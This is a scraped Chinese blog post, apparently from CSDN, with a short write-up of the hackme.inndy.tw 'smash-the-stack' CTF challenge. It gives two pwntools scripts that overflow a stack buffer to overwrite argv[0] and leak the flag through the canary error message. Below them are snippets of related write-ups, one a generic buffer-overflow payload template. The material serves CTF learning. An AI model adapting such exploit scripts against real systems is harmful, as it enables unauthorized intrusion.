hackme pwn smash-the-stack [stack smash]

最新推荐文章于 2023-12-17 21:40:39 发布
最新推荐文章于 2023-12-17 21:40:39 发布
阅读量370 收藏
点赞数
分类专栏: CTF之旅 pwn hackme
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/kevin66654/article/details/86773670
版权

根据提示:stderr!和32C3的readme一样,原理看上篇,这里贴两个exp

#! /usr/bin/env python
# coding=utf-8
from pwn import *

#io = process('./smash-the-stack')
io = remote('hackme.inndy.tw', 7717)

argv_addr = 0xffffcfa4
buf_addr = 0xffffcee8
flag_addr = 0x804a060

payload = 'a' * (argv_addr - buf_addr) + p32(flag_addr)
io.recvuntil('the flag')
io.sendline(payload)
io.interactive()

另外一个:

#!/usr/bin/env python
# coding=utf-8

from pwn import *

io = remote("hackme.inndy.tw", 7717)

flag_addr = 0x804A060
io.recvuntil("the flag\n")
payload = p32(flag_addr) * 0x300
io.sendline(payload)
io.interactive()

 

171119 Pwn-StackSmash
whklhhhh的博客
11-24 1042
1625-5 王子昂 总结《2017年11月19日》 【连续第415天总结】 A. pwn-StackSmash B.原理当程序加了Cannary来保护时,栈溢出会使得程序异常终止并输出错误信息 StackSmash就是利用这个错误信息进行任意地址读取的 报错函数为__stack_chk_fail,代码如下:void __attribute__ ((noreturn)) __stack_c
花式栈溢出技巧----Stack smash
qq_42192672的博客
10-17 1497
学习文献:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/others/#stack-smash 以前遇见过一次这种情况,但是是不求甚解的完成了,这次慢慢分析一下原理 栈保护和NX字段都开启了,这里科普一下栈保护,我喜欢叫它金丝雀,链接:https://blog.youkuaiyun.com/qq_42192672/article...
jarvisoj pwn smashes (2015 32c3-ctf hackme) [Stack Smash]
ACdream
02-07 625
题目链接: https://www.jarvisoj.com/challenges 题目bin文件来源: github - ctfswriteup - 2015 - 32c3ctf - pwn - hackme   分析过程: 开启了NX与Canary 程序流程: 输入名字之后,即可输入一个地址去覆盖flag~这里涉及的知识点是:Stack Smash 当程序开启了Can...
smashthestack的wp
一个码农的笔记
11-13 2285
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了smashthestack这个题目感觉还不错,我把wp分享出来,方便大家学习 smashthestack的要求是:nc hackme.inndy.tw 7717Tips: stderr is available, beware of the output这个题目提示利用错误输出 下面我用ida打开smash
PWN · Stack Smash】[2021 鹤城杯]easyecho
Mr_Fmnwon的博客
07-30 1336
Canary保护,是在栈上插入一段随机数;进入函数后,也就是call完后会有push ebp,mov ebp,esp,最后来个mov esp。canary保护特殊在上述操作后会再加一个canary。最后函数leave ret前会检测一次,canary与原先值是否相同来判断是否被栈溢出覆盖返回地址了。然而,Smash这种方法,恰好是利用Canary保护机制,修改相关函数参数,泄露信息。详细介绍Smash的文章不在少数,本文主要聚焦于做出题目,因此重点(但非详细)阐述我所理解的重点部分。
hackme inndy pwn stack writeup
charlie_heng的专栏
01-02 532
这题看起来很恐怖,所有保护都开了,但是其实并没有想象中难 这题先pop 两次,再push回去一个,然后再push下标,就可以直接绕过canary,把ret的地址给leak出来 再减去libc里面的__libc_start_main偏移,再把低三位给清零就得到libc基址 之后就是常规rop了,这里直接执行system(‘/bin/sh’) 下面就是利用的代码 from pwn imp...
浅谈PWN基础-栈溢出
qq_45751349的博客
04-04 788
一、预备知识 缓冲区溢出简单介绍 缓冲区溢出:简单的说,缓冲区溢出就是超长的数据向小缓冲区复制,导致数据超出了小缓冲区,导致缓冲区其他的数据遭到破坏,这就是缓冲区溢出。而栈溢出是缓冲区溢出的一种,也是最常见的。只不过栈溢出发生在栈,堆溢出发生在堆,其实都是一样的。 二、简介栈 栈:栈是一种计算机系统中的数据结构,它按照先进后出的原则存储数据,先进入的数据被压入栈底,最后的数据在栈顶,需要读数据的时...
CTF比赛PWN题sgtlibc通用快速解题框架
serfend's blog
07-07 1822
开源地址:https://github.com/serfend/sgtlibc使用 安装pwn解题框架例题:buuctf start system_bss_binsh_direct_x64 shellcode_orw_x86 例题:buuctf pwnable_orw libc-leak_x86_puts 例题:ctfshow ret2libc_64 内部赛_签到题 libc-leak_x86_write_pure 例题:buuctf jarvisoj_level1 libc-leak_x86_writ
*** stack smashing detected ***: <unknown> terminated 已放弃 (核心已转储) 栈溢出
lanshi00的博客
09-02 5971
对文件 gdb test core 出现如下问题 Program terminated with signal SIGABRT, Aborted. #0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51 51 ../sysdeps/unix/sysv/linux/raise.c: 没有那个文件或目...
Wargames:io.smashthestack Level 2
请善待每一个被你欺负过的管理员 >_<
07-29 922
第二关,提供了2种通关方式。
pwn】[HNCTF 2022 WEEK3]smash --花式栈溢出
question55的博客
12-17 129
在程序加了 canary 保护之后,如果我们读取的 buffer 覆盖了对应的值时,程序就会报错,而一般来说我们并不会关心报错信息。而 stack smash 技巧则就是利用打印这一信息的程序来得到我们想要的内容。这是因为在程序启动 canary 保护之后,如果发现 canary 被修改的话,程序就会执行 __stack_chk_fail 函数来打印 argv[0] 指针所指向的字符串,正常情况下,这个指针指向了程序名。
Smash The Stack Wargame IO Level 01-04
PuziのPwn
07-23 485
Ref:http://smashthestack.org/ Dat:20140707
stack的wp
一个码农的笔记
11-29 2144
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了stack这个题目感觉还不错,我把wp分享出来,方便大家学习 stack的题目要求是: nc hackme.inndy.tw 7716Here is my C programming homework But compiled with full protection (RELRO, PIE, NX, Sta
hackme.inndy.tw raas 经验总结
qq_43189757的博客
08-05 253
相关资料: Glibc内存管理 如果有人看我的总结的话直接看资料就行了,堆之类的我也刚接触,不怎么熟悉 UAF漏洞原理是 在释放较小的堆块的时候不会立马把这个堆块放到small bins 当中,而会把这个堆块放到fast bins当中, 当需要再次分配堆块的时候会优先再 fast bins寻找合适的堆块,找到了则返回,如果没找到才会去small bins中寻找空闲的堆块。利用这个特性可以造成堆块重...
hackme inndy pwn onepunch writeup
charlie_heng的专栏
12-31 571
继续来做题目,这次的pwn主要功能是一个任意地址写一个字节,然后就结束。。。。 然后找了半天。。。完全没思路。。。一个字节只能写一次。。。。 然后找了下别人的wp,发现代码段居然可以写,那骚操作就可以有很多了 这里比较写入的字节是否为255,是的话就输出No flag for you jnz loc_400773二进制是\x75\x0a 0a是偏移,我们只要把这个弄成负数,就可以...
通过pwnable.kr从零学pwn
热门推荐
giantbranch的专栏
07-31 1万+
本文链接:http://blog.youkuaiyun.com/u012763794/article/details/51992512 下面的这个地址很多ctf的学习资源都是有推荐的 挑战地址:http://pwnable.kr/play.php fd 首先不用说给了就直接连上去 看一下代码 重要函数:read ssize_t read(int fd,void *
Hackme CTF】Web--scoreboard
VZZmieshenquan的博客
04-21 594
Description: DO NOT ATTACK or SCAN scoreboard, you don’t need to do that. Solution: 抓包发现flag在x-flag头里 Flag: FLAG{Header can hide some data aswell.}
hackme guestbook
weixin_43511698的博客
10-18 699
guestbook 题目提示:This guestbook sucks. sqlmap is your friend. 是sql注入 点击Message List 时是空的, 点击post是可以提交新信息,点击查看新信息 在id值后加上" ’ "测试是否存在测试点网页报错说明存在注入点 union 注入 查看列 https://hackme.inndy.tw/gb/?mod=read&i...
hackme login as admin 0
weixin_43511698的博客
10-18 811
hackme 简单sql注入题 进入题目页面提示查看源码(关键代码如下) function safe_filter($str) { $strl = strtolower($str); if (strstr($strl, 'or 1=1') || strstr($strl, 'drop') || strstr($strl, 'update') || strstr($s...
攻防世界pwn pwn-100
最新发布
01-18
### 关于攻防世界PWN-100题目的解答 #### 解决方案概述 对于攻防世界的PWN-100题目,通常涉及的是基础的缓冲区溢出攻击。这类题目旨在测试参赛者对Linux防护机制的理解程度以及绕过这些保护措施的能力。常见的技术包括但不限于返回导向编程(Return-Oriented Programming, ROP)、重定向到已知位置的shellcode执行(ret2shellcode)或是利用动态链接库中的函数实现系统命令调用(ret2libc)[^1]。 #### 技术细节 当面对没有启用地址空间布局随机化(ASLR)且未开启不可执行堆栈(NX bit off)的情况时,可以直接采用`ret2shellcode`的方式解决问题。此方法要求选手能够找到足够的空间放置自定义的shellcode,并通过控制EIP指向这段代码来完成最终的目标——通常是打开一个远程shell连接给攻击者[^3]。 如果遇到开启了NX位但是禁用了位置独立可执行文件(PIE),那么可以考虑使用`ret2libc`策略。这种方法依赖于将返回地址设置为标准C库(glibc)内的某个有用功能的位置,比如system()函数,从而间接地触发所需的恶意操作而无需注入新的机器码片段。 针对具体环境下的不同情况,还需要掌握诸如IDA Pro这样的反汇编工具来进行二进制分析工作;同时熟悉GDB调试技巧以便更好地理解程序内部逻辑并定位潜在的安全漏洞所在之处。 ```python from pwn import * # 连接到远程服务 conn = remote('challenge.ctf.games', PORT) # 发送payload前先接收初始消息 print(conn.recvline()) # 构造payload offset = 64 # 假设偏移量为64字节 junk = b'A' * offset return_address = pack('<I', 0xdeadbeef) # 替换为目标地址 exploit_payload = junk + return_address # 发送payload conn.send(exploit_payload) # 接收响应数据 result = conn.recvall() print(result.decode()) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值